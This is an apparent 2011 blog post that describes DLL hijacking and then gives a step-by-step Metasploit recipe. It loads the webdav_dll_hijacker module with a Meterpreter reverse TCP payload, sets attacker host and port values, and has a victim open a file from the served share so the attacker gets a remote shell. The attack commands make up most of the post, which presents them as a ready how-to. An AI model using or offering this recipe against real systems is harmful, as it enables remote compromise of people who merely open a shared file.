Saturday, 30 April 2011

DLL Hijacking

This vulnerability is triggered when a vulnerable file type is opened from the server that is hosting the files.
Ususally , the user has to browse into the directory and open the file, this can be any file, even blank one with nothing inside.
The flaw is that the application launched to handle the file type will inadvertently load a DLL from the working directory , and then we got our
shell. So lets do this one.

1) open msfconsole
msf> search webdav.dll
msf> use windows/browser/webdav_dll_hijacker
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set BASENAME  reports
msf> set extensions grp
msf> set LHOST 192.168.1.69
msf> set SRVHOST 192.168.1.69
msf> set LPORT 8888
msf> set SRVPORT 80
msf> set SHARENAME documents
msf> exploit
Now , go to the client and browse this directory file://192.1681.1.69/ and click on any file
Done, you have your shell
msf> sessions

Now, go to this website to see the list of all apps that are vulnerable
http://vupen.com/english/searchengine.php?keyword=insecure+library+loading

No comments:

Post a Comment